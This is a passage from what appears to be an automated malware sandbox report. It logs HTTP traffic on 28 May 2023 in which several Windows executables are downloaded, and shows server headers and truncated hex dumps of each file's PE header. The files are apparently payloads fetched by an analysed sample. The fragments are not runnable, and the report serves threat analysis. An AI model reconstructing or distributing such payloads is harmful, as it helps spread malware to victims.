02 00 00 00 0d 00 00 90 02 00 00 ec 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 ac 6f 00 00 00 90 0f 00 00 36 00 00 00 7c 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 e0 97 00 00 00 00 10 00 00 98 00 00 00 b2 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 5f 52 44 41 54 41 00 00 94 00 00 00 00 a0 10 00 00 02 00 00 00 4a 10 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 f8 00 00 00 00 b0 10 00 00 02 00 00 00 4c 10 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 14 00 00 00 c0 10 00 00 16 00 00 00 4e 10 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 28 May 2023 08:43:01 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40Last-Modified: Tue, 23 May 2023 07:04:01 GMTETag: "51e00-5fc56fdfa7238"Accept-Ranges: bytesContent-Length: 335360Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 dd 6d c9 53 99 0c a7 00 99 0c a7 00 99 0c a7 00 0a 42 3f 00 98 0c a7 00 f6 7a 39 00 89 0c a7 00 f6 7a 0c 00 b3 0c a7 00 f6 7a 0d 00 fa 0c a7 00 90 74 34 00 9e 0c a7 00 99 0c a6 00 ec 0c a7 00 f6 7a 08 00 98 0c a7 00 f6 7a 3d 00 98 0c a7 00 f6 7a 3a 00 98 0c a7 00 52 69 63 68 99 0c a7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b7 05 7f 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 54 01 00 00 b0 2b 00 00 00 00 00 1c 77 00 00 00 10 00 00 00 70 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 f0 2c 00 00 04 00 00 f9 b9 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 59 01 00 50 00 00 00 00 c0 2c 00 28 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 43 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 c8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 96 53 01 00 00 10 00 00 00 54 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 6c 48 2b 00 00 70 01 00 00 98 03 00 00 58 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 28 2d 00 00 00 c0 2c 00 00 2e 00 00 00 f0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 28 May 2023 08:43:04 GMTContent-Type: application/octet-streamContent-Length: 5129728Last-Modified: Fri, 26 May 2023 16:27:32 GMTConnection: keep-aliveETag: "6470ddf4-4e4600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f4 dd 70 64 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 3c 4e 00 00 08 00 00 00 00 00 00 9e 5a 4e 00 00 20 00 00 00 60 4e 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 4e 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 5a 4e 00 4b 00 00 00 00 60 4e 00 d0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4e 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 3a 4e 00 00 20 00 00 00 3c 4e 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d0 04 00 00 00 60 4e 00 00 06 00 00 00 3e 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 4e 00 00 02 00 00 00 44 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 5a 4e 00 00 00 00 00 48 00 00 00 02 00 05 00 f4 44 4e 00 5c 15 00 00 03 00 00 00 01 00 00 06 d8 27 00 00 1a 1d 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 03 00 5f 01 00 00 01 00 00 11 7e 03 00 00 04 2c 0d 28 11 00 00 06 2c 06 16 28 0d 00 00 0a 7e 04 00 00 04 2c 0d 28 13 00 00 06 2c 06 16 28 0d 00 00 0a 7e 05 00 00 04 2c 0d 28 15 00 00 06 2c 06 16 28 0d 00 00 0a 7e 06 00 00 04 2c 0d 28 16 00 00 06 2c 06 16 28 0d 00 00 0a 7e 01 00 00 04 2c 10 7e 02 00 00 04 20 e8 03 00 00 5a 28 0e 00 00 0a 7e 07 00 00 04 2c 11 72 01 00 00 70 72 01 00 00 70 16 28 09 00 00 06 26 16 0a 38 c2 00 00 00 7e 0c 00 00 04 06 6f 0f 00 00 0a 0b 7e 0d 00 00 04 06 6f 0f 00 00 0a 0c 7e 0e 00 00 04 06 6f 0f 00 00 0a 0d 7e 0f 00 00 04 06 6f 0f 00 00 0a 13 04 07 28 08 00 00 06 13 05 7e 0a 00 00 04 2c 09 11 05 28 02 00 00 06 13 05 7e 09 00 00 04 72 03 00 00 70 28 10 00 00 0a 2c 1a 28 11 00 00 0a 72 19 00 00 70 6f 12 00 00 0a 11 05 28 04 00 00 06 13 05 2b 29 7e 09 00 00 04 72 31 00 00 70 28 10 00 00 0a 2c 18 11 05 28 11 00 00 0a 72 19 00 00 70 6f 12 00 00 0a 28 03 00 00 06 13 05 11 04 07 08 28 13 00 00 0a 28 14 00 00
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 28 May 2023 08:43:04 GMTServer: Apache/2.4.37 (Win64) PHP/5.6.40Last-Modified: Sat, 31 Jul 2021 08:44:14 GMTETag: "2600-5c86757379380"Accept-Ranges: bytesContent-Length: 9728Connection: closeContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b1 8e c0 9c f5 ef ae cf f5 ef ae cf f5 ef ae cf ae 87 af ce f0 ef ae cf f5 ef af cf ff ef ae cf 6f 81 a7 ce f0 ef ae cf 6f 81 ac ce f4 ef ae cf 52 69 63 68 f5 ef ae cf 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 bc 80 04 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 12 00 00 00 12 00 00 00 00 00 00 fa 1a 00 00 00 10 00 00 00 30 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 00 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 bc 3a 00 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 2c 02 00 00 d0 39 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 00 00 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ab 10 00 00 00 10 00 00 00 12 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 de 0b 00 00 00 30 00 00 00 0c 00 00 00 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 2c 02 00 00 00 50 00 00 00 04 00 00 00 22 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 28 May 2023 08:43:09 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40Last-Modified: Tue, 23 May 2023 07:04:01 GMTETag: "51e00-5fc56fdfa7238"Accept-Ranges: bytesContent-Length: 335360Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 dd 6d c9 53 99 0c a7 00 99 0c a7 00 99 0c a7 00 0a 42 3f 00 98 0c a7 00 f6 7a 39 00 89 0c a7 00 f6 7a 0c 00 b3 0c a7 00 f6 7a 0d 00 fa 0c a7 00 90 74 34 00 9e 0c a7 00 99 0c a6 00 ec 0c a7 00 f6 7a 08 00 98 0c a7 00 f6 7a 3d 00 98 0c a7 00 f6 7a 3a 00 98 0c a7 00 52 69 63 68 99 0c a7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b7 05 7f 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 54 01 00 00 b0 2b 00 00 00 00 00 1c 77 00 00 00 10 00 00 00 70 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 f0 2c 00 00 04 00 00 f9 b9 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 59 01 00 50 00 00 00 00 c0 2c 00 28 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 43 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 c8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 96 53 01 00 00 10 00 00 00 54 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 6c 48 2b 00 00 70 01 00 00 98 03 00 00 58 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 28 2d 00 00 00 c0 2c 00 00 2e 00 00 00 f0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 28 May 2023 08:43:09 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40Last-Modified: Sun, 28 May 2023 08:40:04 GMTETag: "c3e00-5fcbceaa1bec3"Accept-Ranges: bytesContent-Length: 802304Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 26 ff f6 9e 62 9e 98 cd 62 9e 98 cd 62 9e 98 cd 7c cc 0d cd 7f 9e 98 cd 7c cc 1b cd 18 9e 98 cd 7c cc 1c cd 48 9e 98 cd 45 58 e3 cd 6b 9e 98 cd 62 9e 99 cd ea 9e 98 cd 7c cc 12 cd 63 9e 98 cd 7c cc 0c cd 63 9e 98 cd 7c cc 09 cd 63 9e 98 cd 52 69 63 68 62 9e 98 cd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 d0 34 fa 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 4e 0a 00 00 28 26 00 00 00 00 00 59 4e 00 00 00 10 00 00 00 60 0a 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 a0 30 00 00 04 00 00 01 83 0c 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 88 51 0a 00 64 00 00 00 00 c0 2e 00 98 93 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 30 00 e4 0d 00 00 20 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 31 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 d4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 4a 4c 0a 00 00 10 00 00 00 4e 0a 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 44 58 24 00 00 60 0a 00 00 1e 00 00 00 52 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 98 93 01 00 00 c0 2e 00 00 94 01 00 00 70 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 38 00 00 00 60 30 00 00 3a 00 00 00 04 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 28 May 2023 08:43:09 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40Last-Modified: Tue, 23 May 2023 07:04:01 GMTETag: "51e00-5fc56fdfa7238"Accept-Ranges: bytesContent-Length: 335360Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 dd 6d c9 53 99 0c a7 00 99 0c a7 00 99 0c a7 00 0a 42 3f 00 98 0c a7 00 f6 7a 39 00 89 0c a7 00 f6 7a 0c 00 b3 0c a7 00 f6 7a 0d 00 fa 0c a7 00 90 74 34 00 9e 0c a7 00 99 0c a6 00 ec 0c a7 00 f6 7a 08 00 98 0c a7 00 f6 7a 3d 00 98 0c a7 00 f6 7a 3a 00 98 0c a7 00 52 69 63 68 99 0c a7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b7 05 7f 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 54 01 00 00 b0 2b 00 00 00 00 00 1c 77 00 00 00 10 00 00 00 70 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 f0 2c 00 00 04 00 00 f9 b9 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 59 01 00 50 00 00 00 00 c0 2c 00 28 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 43 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 c8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 96 53 01 00 00 10 00 00 00 54 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 6c 48 2b 00 00 70 01 00 00 98 03 00 00 58 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 28 2d 00 00 00 c0 2c 00 00 2e 00 00 00 f0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 28 May 2023 08:43:09 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40Last-Modified: Tue, 23 May 2023 07:04:01 GMTETag: "51e00-5fc56fdfa7238"Accept-Ranges: bytesContent-Length: 335360Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 dd 6d c9 53 99 0c a7 00 99 0c a7 00 99 0c a7 00 0a 42 3f 00 98 0c a7 00 f6 7a 39 00 89 0c a7 00 f6 7a 0c 00 b3 0c a7 00 f6 7a 0d 00 fa 0c a7 00 90 74 34 00 9e 0c a7 00 99 0c a6 00 ec 0c a7 00 f6 7a 08 00 98 0c a7 00 f6 7a 3d 00 98 0c a7 00 f6 7a 3a 00 98 0c a7 00 52 69 63 68 99 0c a7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b7 05 7f 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 54 01 00 00 b0 2b 00 00 00 00 00 1c 77 00 00 00 10 00 00 00 70 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 f0 2c 00 00 04 00 00 f9 b9 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 59 01 00 50 00 00 00 00 c0 2c 00 28 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 43 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 c8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 96 53 01 00 00 10 00 00 00 54 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 6c 48 2b 00 00 70 01 00 00 98 03 00 00 58 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 28 2d 00 00 00 c0 2c 00 00 2e 00 00 00 f0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 